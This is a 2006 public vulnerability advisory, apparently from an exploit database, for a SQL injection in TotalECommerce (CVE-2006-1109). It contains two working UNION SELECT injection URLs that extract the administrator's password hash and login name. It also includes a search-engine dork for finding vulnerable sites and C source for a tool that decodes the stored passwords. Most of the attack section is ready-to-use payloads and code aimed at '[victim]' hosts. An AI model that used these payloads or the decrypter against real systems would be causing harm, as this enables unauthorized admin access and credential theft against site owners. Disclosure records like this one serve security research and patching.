TotalECommerce (index.asp id) Remote SQL InjectionVulnerability.

2006.03.05
Credit: nukedx
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-1109
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--Security Report-- Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 04/03/06 04:36 AM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: TotalECommerce (http://www.totalecommerce.com) Version: 1.0 and prior version must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to id parameter in index.asp Level: Critical --- How&Example: GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha, senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha+from+administradores EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login, login,login,login,login,login, login,login,login,login,login,login,login,login,login,login,login,login, login,login,login,login,login,login,login, login,login,login,login,login,login,login+from+administradores with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name [PageID]: must be working page id you can get some from frontpage. --- Timeline: * 04/03/2006: Vulnerability found. * 04/03/2006: Could not contact with vendor. * 04/03/2006: File closed. --- Exploit&Decrypter: http://www.nukedx.com/?getxpl=18 --- Dorks: intext:"totalecommerce" --- Original advisory: http://www.nukedx.com/?getxpl=18 --- Decrypter source in C --- /********************************************* * TotalECommerce PWD Decrypter * * Coded by |SaMaN| for nukedx * * http://www.k9world.org * * IRC.K9World.Org * *Advisory: http://www.nukedx.com/?viewdoc=18 * **********************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { char buf[255]; char buf2[255]; char buf3[255]; char *texto; char *vcrypt; int i,x,z,t = 0; char saman; texto = buf; vcrypt = buf2; printf("%s", "|=------------------------------------=|n"); printf("%s", " Coded by |SaMaN| @ IRC.K9World.Orgn"); printf("%s", "|=------------------------------------=|nn"); printf("%s", "Enter crypted password: "); scanf("%200s", buf); if (!texto) vcrypt = ""; for (i = 0; i < strlen(texto); i++) { if ((vcrypt == "") || (i > strlen(texto))) x = 1; else x = x + 1; t = buf[i]; z = 255 - t; saman = toascii(z); snprintf(buf3, 250, "%c", saman); strncat(buf2, buf3, 250); } printf("Result: %sn", buf2); return; } ---End of code--- Greets to: |SaMaN|


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top